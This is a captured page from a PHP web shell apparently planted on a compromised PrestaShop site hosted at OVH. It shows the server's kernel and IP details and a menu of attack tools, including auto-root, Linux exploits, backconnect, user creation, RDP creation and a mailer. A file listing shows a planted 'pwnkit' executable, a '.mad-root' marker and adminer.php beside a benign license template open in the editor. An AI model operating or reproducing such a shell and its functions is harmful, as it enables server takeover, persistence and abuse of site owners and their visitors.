Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
install /
theme /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
configure.phtml
8.42
KB
-rw----r--
database.phtml
3.15
KB
-rw----r--
footer.phtml
2.19
KB
-rw----r--
header.phtml
4.89
KB
-rw----r--
index.php
1.24
KB
-rw----r--
license.phtml
1.52
KB
-rw----r--
license_content.phtml
21.16
KB
-rw----r--
process.phtml
5.2
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
system.phtml
1.49
KB
-rw----r--
welcome.phtml
2.17
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license.phtml
<?php $this->displayTemplate('header') ?> <!-- License agreement --> <h2 id="licenses-agreement"><?php echo $this->l('License Agreements') ?></h2> <p><strong><?php echo $this->l('To enjoy the many features that are offered for free by PrestaShop, please read the license terms below. PrestaShop core is licensed under OSL 3.0, while the modules and themes are licensed under AFL 3.0.') ?></strong></p> <div style="height:200px; border:1px solid #ccc; margin-bottom:8px; padding:5px; background:#fff; overflow: auto; overflow-x:hidden; overflow-y:scroll;"> <?php $this->displayTemplate('license_content'); ?> </div> <div> <input type="checkbox" id="set_license" class="required" name="licence_agrement" value="1" style="vertical-align: middle;float:left" <?php if ($this->session->licence_agrement): ?>checked="checked"<?php endif; ?> /> <div style="float:left;width:600px;margin-left:8px"><label for="set_license"><strong><?php echo $this->l('I agree to the above terms and conditions.') ?></strong></label></div> <!-- <br /> <input type="checkbox" id="configuration_agrement" name="configuration_agrement" value="1" style="vertical-align: middle;float:left" <?php if ($this->session->configuration_agrement): ?>checked="checked"<?php endif; ?> /> <div style="float:left;width:600px;margin-left:8px"><label for="configuration_agrement"><strong><?php echo $this->l('I agree to participate in improving the solution by sending anonymous information about my configuration.') ?></strong></label></div> --> </div> <?php $this->displayTemplate('footer') ?>
Close